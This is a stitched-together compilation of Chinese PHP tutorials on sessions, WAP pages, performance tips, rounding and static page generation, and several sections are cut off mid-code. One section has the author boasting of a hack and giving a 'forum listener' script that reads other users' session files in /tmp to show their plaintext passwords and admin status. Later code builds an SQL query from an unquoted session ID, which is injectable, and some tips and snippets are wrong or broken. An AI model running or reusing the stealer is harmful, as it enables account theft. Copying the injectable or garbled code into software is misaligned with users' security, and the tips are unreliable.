PHP入门

一、session概述

 
      session是什么，刚开始我也不明白，非专业词典翻译为会议，会议期。作个不太恰当的比喻吧
（虽然不恰当，但意义却是一样的），session是你和网站之间的感情。
session在WEB技术中占有非常重要的份量。由于网页是一种无状态的连接程序，因此你无法得知用户的浏览状态。因此我们必须 
通过session记录用户的有关信息，以供用户再次以此身份对web服务器提供要求时作确认，例
如，我们在某些网站中常常要求用户登录， 但我们怎么知道用户已经登录了呢，如果没有session的话，登录信息是无法保留的，那岂不要让用户在每一页网页中都要提供用户名和密码。
 
当然，session不光用于用户身份认证功能，还可能用于其它方面，以后我们会提到的。
session用中文来解释就是会话期。一个会话期开始于用户输入一个站点的网址时，结束于他离开这个站点时。session最早出现在动态脚本语言Active Server Pages中，它的功能之强大，是一句话无法说清楚的。

 
当php还在3.0版本时，session是它永远的痛。虽然php具有执行速度快，使用灵活，功能强大等优点，但因为session的问题，使很多站点的开发放弃了php,至少我的老板是这样认为的。当时有很多php免费函数库提供在php3上实现session的方案，但都让人感觉不正宗。就好象你花好几千大洋买的手机却配置一个很粗糙的草作的袋子一样，虽然功能是一样的，但总让人觉得别扭。php4的出现让php在session问题上有了翻身的机会。虽然它的session实现还不是很理想(主要是效率问题),但毕竟是它自己实现的，而且可以实际使用了。
那我们用session干什么呢，你说了半天，我用不上的话，你岂不有卖纸张之嫌。OK,我们来看看session有什么用:作过网站的人都有这样的体会，在一页页面中的变量(在本章都指服务器端变量，下同)是不能在下一页中用的，虽然有一些办法可以实现，比如用form，urlstring等等,但有些对于用户来说是不方便的，即使让form自动提交，但其中的延时在现今的网络状况下足以让人窒息,而这两种方法都明显加大程序员的负担。如果你正在开发一个大型项目，那这些额外的负担是不能忽略的。而有了session就好办了，session中注册的变量可以作为全局变量使用。什么,全局变量? 好极了。这样一来，你知道有什么用了吧:最主要的用于用户身份认证,程序状态记录，页面之间参数传递。

           关于session的几个补充函数
在PHP下，关于session的讨论很多，其实在PHP4中还有几个函数是我们平时没有注意到的。
下面我把它们介绍给大家吧。
其中的session_set_save_handler()可真是个好东西。
//********************
session_unset (PHP4 >= 4.0b4)
void session_unset(void);
这个函数可以把当然注册的所有的session变量置为空。注意它不是unregister，也不同于destroy。
下面这个例子，对此函数做了很好的说明。
<?php
session_register("a","b","c"); //auto-session-start
$a=1;
$b=2;
$c=3;
session_unregister("a"); //unregistrered $a
echo "A: $a - reg:".session_is_registered("a")."
"; // but the global $a remains
session_unset(); // unsets $b und $c
echo "B:$b - reg:".session_is_registered("b")."
"; // the registration remains !
echo "C:$c - reg:".session_is_registered("c")."
";
echo session_encode();
?>
输出：
A: 1 - reg:
B: - reg:1
C: - reg:1
!b|!c|
//********************************
session_get_cookie_params (PHP4 >= 4.0RC2)
array session_get_cookie_params (void);
返回一个数组，记录了当前session的cookie的一些信息。
有：
"lifetime" - cookie的生存期。
"path" - cookie的保存路径。
"domain" - cookie的域。
//*******************************
session_set_cookie_params (PHP4 >= 4.0b4)
void session_set_cookie_params (int lifetime [, string path ][, string domain]])
设置session的cookie的一些参参数，类似于php.ini中的设置，但本函数所作的设置，只对当前脚本文件有效。
//*******************************
下面要介绍的这个函数应是对大家都很有用的，你是不是对自定义一个不用cookie来保存的session有兴趣呢？这个函数就可以实现你这样的设想。
让我想想，如果不用cookie的好处是什么？至少一点，你不用担心客户端的的cookie的功能是否打开了，对吧。

使用无限生命期Session的方法
本文不敢说非常好，但是笔者相信大多数PHPer都曾经想过这些问题。
使用无限生命期Session的方法
在PHP4.0中加入了对Session的支持，方便了我们很多程序，比如购物车等等！
在很多论坛中，Session也用于处理用户的登陆，记录下用户名和密码，使得用户不必每次都输入自己的用户名和密码！但是一般的Session的生命期有限，如果用户关闭了浏览器，就不能保存Session的变量了！那么怎么样可以实现Session的永久生命期呢？
大家知道，Session储存在服务器端，根据客户端提供的SessionID来得到这个用户的文件，然后读取文件，取得变量的值，SessionID可以使用客户端的Cookie或者Http1.1协议的Query_String（就是访问的URL的“?”后面的部分）来传送给服务器，然后服务器读取Session的目录……
要实现Session的永久生命期，首先需要了解一下php.ini关于Session的相关设置（打开php.ini文件，在“[Session]”部分）：
1、session.use_cookies：默认的值是“1”，代表SessionID使用Cookie来传递，反之就是使用Query_String来传递；
2、session.name：这个就是SessionID储存的变量名称，可能是Cookie，也可能是Query_String来传递，默认值是“PHPSESSID”；
3、session.cookie_lifetime：这个代表SessionID在客户端Cookie储存的时间，默认是0，代表浏览器一关闭SessionID就作废……就是因为这个所以Session不能永久使用！
4、session.gc_maxlifetime：这个是Session数据在服务器端储存的时间，如果超过这个时间，那么Session数据就自动删除！
还有很多的设置，不过和本文相关的就是这些了，下面开始讲使用永久Session的原理和步骤。
前面说过，服务器通过SessionID来读取Session的数据，但是一般浏览器传送的SessionID在浏览器关闭后就没有了，那么我们只需要人为的设置SessionID并且保存下来，不就可以……
如果你拥有服务器的操作权限，那么设置这个非常非常的简单，只是需要进行如下的步骤：
1、把“session.use_cookies”设置为1，打开Cookie储存SessionID，不过默认就是1，一般不用修改；
2、把“session.cookie_lifetime”改为正无穷（当然没有正无穷的参数，不过999999999和正无穷也没有什么区别）;
3、把“session.gc_maxlifetime”设置为和“session.cookie_lifetime”一样的时间；
设置完毕后，打开编辑器，输入如下的代码：

WAP（无线通讯协议）是在数字移动电话、个人手持设备（PDA等）及计算机之间进行通讯的开放性全球标准。由于静态的WAP页面在很多方面不能满足用户个性化的服务请求，因此通过WAP服务器端语言产生动态的WML页面，具有很广泛的应用价值和很高的商业价值。
　　WAP应用结构非常类似于Internet，一个典型的WAP应用请求是这样的：首先，具有WAP用户代理功能的移动终端(WAP手机等)通过内部运行的微浏览器(Micro Browser)对某一网站以无线方式发送WAP服务请求。该请求先由WAP网关截获，对信息内容进行编码压缩，以减少网络数据流量，同时根据需要将WAP协议转换成HTTP协议，然后将处理后的请求转送到相应WAP服务器。在WAP服务器端，根据页面扩展名等性质，被请求的页面直接或由服务器端脚本解释后输出，再经网关传回用户。
　　从上述WAP应用流程可以看到，生成动态WAP页面与动态产生Web网页的过程非常类似。但是由于WAP应用使用的WML语言来源于语法严格的XML，因此要求输出的格式必须按WAP网页的规范输出。同时，由于WAP协议的应用范围、移动客户端的软硬件水平等特殊性，对每次输出的页面的大小、图像的格式及容量都有一定限制。下面我们以PHP脚本语言为例，看看如何动态输出WAP页面。
　　一、设置WEB服务器
　　首先你的 Web服务器要安装好PHP，即能处理PHP脚本程序。其次，为使Web服务器能同时识别和处理PHP、WML、WBMP等文件，Web 服务器的MIME表需添加以下的几种文件类型。
　　text/vnd.wap.wml .wml
　　image/vnd.wap.wbmp .wbmp
　　application/vnd.wap.wmlc .wmlc
　　text/vnd.wap.wmls.wmls
　　application/vnd.wap.wmlsc .wmlsc
　　二、用PHP输出简单动态WAP页面
　　下面有一个最简单的PHP生成WAP页面的例子。注意由于需要PHP解释器来解释该程序，并输出WAP页面，因此所有类似程序应以.php为扩展名。
　　〈?php
　　header(″Content－type: text/vnd.wap.wml″);
　　echo (″〈wml〉 〈card〉 〈p〉″);
　　echo date( ″l dS of F Y h:i:s A″ );
　　echo (″〈/p〉〈/card〉〈/wml〉″);
　　?〉
　　该例子在WAP手机模拟器中可以浏览，输出当前日期时间，而在普通的浏览器中无法识别，甚至会被认为是错误下载。这是因为在程序开头就声明了该输出文档为WML类型，该类型只有WAP设备能够识别并解释。值得注意的是，我们常见的HTML语言对规范性要求不严，大多数浏览器能“容忍”其中相当多的编写错误，而WML规范相当严格，一点失误都可能导致无法输出所需页面。

1,在函数中,传递数组时
使用 return 比使用 global 要高效
比如
function userloginfo($usertemp){
$detail=explode("|",$usertemp);
return $detail;
}
$login=userloginfo($userdb);
比
function userloginfo($usertemp){
global $detail;
$detail=explode("|",$usertemp);
}
userloginfo($userdb);
要高效
2,(这个代码用于得到程序目录对应的网址,推荐使用)
$urlarray=explode(/,$HTTP_SERVER_VARS[REQUEST_URI]);
$urlcount=count($urlarray);unset($urlarray[$urlcount-1]);
$ofstarurl=http://.$HTTP_SERVER_VARS[HTTP_HOST].implode(/,$urlarray);
这段代码比
$pre_urlarray=explode(/,$HTTP_SERVER_VARS[HTTP_REFERER]);
$pre_url=array_pop($pre_urlarray);
要高效
3,在循环中判断时,数值判断使用恒等要比等于高效
$a=2;$b=2;
比如
if($a==$b)$c=$a;
比
if($a===$b)$c=$a;
高效
4,mysql 查询时尽量使用where in 少用 limit
limit查多记录的前几条, 速度很快, 但是查询最面几条就会慢
使用in .在查询连续性记录,非常快, 非连续性记录第一次运行会稍微慢一点,但是之后将比较快!
5,NT服务器数据操作稳定性不及unix/linux
6,输出前使用尽量使用 ob_start(); 可以加快输出速度,适用NT或nuli/linux,对unlix类服务器 如果使用 ob_start(ob_gzhandler);输出效率将更高
7,判断的时候尽量使用if($a==他的值) 否定的时候尽量使用if(empty($a)),因为这样程序运行更快速
8,使用不等时 != 与 <> 效率相当
9,个人经验得 使用 $a="11111111111111"; 的效率和 $a=11111111111111; 相当.并不象书本说的相差很大
10,使用规范的SQL语句, 会有利于MySQL的解析
11,使用
if($online){
$online1=$online;
setcookie(online1,$online,$cookietime,$ckpath,$ckdomain,$secure);
}
COOKIE将马上生效
使用
if($online)
setcookie(online1,$online,$cookietime,$ckpath,$ckdomain,$secure);
COOKIE需要再刷新一次才能生效
12,使用
$handle=fopen($filename,wb);
flock($handle,LOCK_SH);

PHP:

比如我有0.10456，要变成10.5%？
round
(PHP 3, PHP 4 )
round -- 对浮点数进行四舍五入
说明
float round ( float val [, int precision])
返回将 val 根据指定精度 precision（十进制小数点后数字的数目）进行四舍五入的结果。precision 也可以是负数或零（默认值）。
注意
PHP 默认不能正确处理类似 "12,300.2" 的字符串。见字符串转换为数值。
echo round(3.4); // 3
echo round(3.5); // 4
echo round(3.6); // 4
echo round(3.6, 0); // 4
echo round(1.95583, 2); // 1.96
echo round(1241757, -3); // 1242000
注: precision 参数仅在 PHP 4 中可用。
echo round(0.10456*100,1);
<?php
$num = 0.10456;
echo round(($num*100),1)."%";
?>

Attributed to Solomon W. Golomb; a method for swapping the values of two integer variables without using an intermediate variable (you can tell this dates from the Elder Days, when variables were expensive!). Thanks to PHPs syntax its also a one-liner.
$a^=$b^=$a^=$b;
Okay, heres how it goes (yeah, like I need to make content-free posts just for the sake of an increment...).
First, simplify the line; noting that ^= is right-associative, which means that in that line the rightmost operator is evaluated first, that the assignment operators also return the value that they assign to their lvalue, and that foo^=bar is shorthand for foo=foo^bar:

之所以是能写出来这个函数，主要是对该网站的session结构清楚，如：name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1"，也知道该session存放的位置，而且可以上传文件，所以嘛，当时就做了一次小小的黑客，在线的朋友的密码可以一览无余，呵呵：
<?
function submit1(){
global $username;
print "<title>论坛监听器</title>";
$i=0;
if($username=="tasm"||$username=="Tasm")
{
print "你也太黑了吧？连我你也查？";
    return;
}
$path="/tmp/";
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)=="sess"){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(";",$ary[0]);
$name= explode(":",$ary[0]);
if($name[2]==""".$username."""){
$passwd= explode(":",$ary[1]);
$mode=explode(":",$ary[3]);
print "用户笔名:".$name[2]."<br>使用密码:".$passwd[2]."<br>使用模式:";
if($mode[1]==1)
print "<font color=red>管理员</font>";
else
print "一般用户";
print"<br><br>偷窃他人密码是不道德行为请少少为之<br>";
$i=1;
break;
}}}}
if(!$i)
print "用户:".$username."真的在线吗？如你确定，<a href=javascript：history.go(-1)>请再来一次</a>，不要多打空格！";
$d->close();
}
function login(){
?>
<html>
<head>
<title>论坛监听器</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF">
<div align="center">
<p>论坛监听器 </p>
<p> </p>

session通常放在/tmp目录下，而该文件夹的权限是everbody可读，这个就非常可怕了！学校的论坛曾经就有人通过session来盗取帐号！所以后来就尝试把session放入数据库，表的结构和过程如下：
//创建表
//create sesslib.sql
CREATE TABLE sesslib (
    data text,
    time datetime,
    id int(11) DEFAULT 0 NOT NULL auto_increment,
    sid varchar(32) NOT NULL,
    PRIMARY KEY (id),
    UNIQUE sid (sid)
);
//End
//XX.php自定义了session的数据库路径，当某个页面需要使用//session时，可以include这个部分，使用方法为：
<?
include "XX.php";//XX.php
session_start();
//以下就可以正常使用session了
?>
/******************************************************/
    XX.php 内容：
/*****************************************************/
<?
$sess_dbh="";
$sess_maxlifetime=get_cfg_var("session.gc_maxlifetime");
function sess_open($save_path, $session_name) {
    global $hostname, $dbusername, $dbpassword, $dbname, $sess_dbh;
    
    //$sess_dbh=mysql_pconnect($hostname,$dbusername,$dbpassword) or die("不能连接数据库！");
    $sess_dbh=mysql_pconnect(localhost,test,test) or die("不能连接数据库！");
    // mysql_select_db("$dbname") or die("不能选择数据库！");
mysql_select_db(test) or die("不能选择数据库！");
    return(true);
}
function sess_close() {
    //mysql_close();
    return(true);
}
function sess_read($sid) {
    global $sess_dbh;
    $result = mysql_query("select data from sesslib where sid=$sid", $sess_dbh);

在最近几年，万维网（也称环球信息网，即WWW）不断改变信息处理技术的面貌。WEB已经快速地成为一种有效的媒介，并适合人们和商业沟通和协作。几乎所有的信息技术领域都普遍受到WEB的影响。Web访问带来更多用户和更多数据，这意味着给服务器和数据库更多压力和最终用户得到越来越慢的响应速度。与不断靠增加CPU，磁盘驱动器及内存来跟上这种增长的需求相比， WEB动态网页面静态化应该是一个更实用，更经济的选择。
用PHP实现WEB动态网页静态化的具体实现函数如function gen_static_file()所示
function gen_static_file($program, $filename)
{
$program 1= "/usr/local/apache/htdocs/php/" . $program;
$filename1 = "/usr/local/apache/htdocs/ static_html/" . $filename;
$cmd_str = "/usr/local/php4/bin/php " . $program1 . " } " . $filename1 . " ";
system($cmd_str);
echo $filename . " generated.〈br〉";
}
这个函数是实现静态化的关键，即PHP动态页面程序不是被送到浏览器中，而是输入到名为$filename的文件中去（如图2）。两个参数中$program是PHP动态页面程序，$filename是生成的静态页面的名字（可根据需要自己制定命名规则，这一点很重要，见下文），/usr/local/php4/bin/php是PHP中具有把程序输入文件功能的部分，System是PHP中执行外部命令的函数。我们还可以看出所有生成动态页面的php程序需放在/php/目录下，所有新产生的静态页面则会出现在/static_html/目录下（这些路径可以根据具体需要设置）。
下面让我们举个具体例子，看一下college_static.php的静态页面是怎样生成的。
function gen_college_static ()
{
for ($i = 0; $i 〈= 32; $i++〉
{
putenv("province_id=" . $i); //*.php文件从数据库取数据时要用到。
$filename = " college_static". $i . ".html";
gen_static_file("college_static.php", $filename);
}
从这个函数我们可以看到通过调用函数gen_static_file（）, college_static.php经过静态化，变成了33个静态页面college.static0.html~college.static33.html，其中$filename会随着$I的变化而变化。当然也可以从数据库中直接取值，来控制生成的静态页面的个数和名字，其他程序对生成的静态页面的调用应和静态页面的命名规则一致。

$message= <<<EOD
......成堆的字符串 如批量HTML代码 可以念
EOD;
装载到  $message 中。
$to=

;
$mail =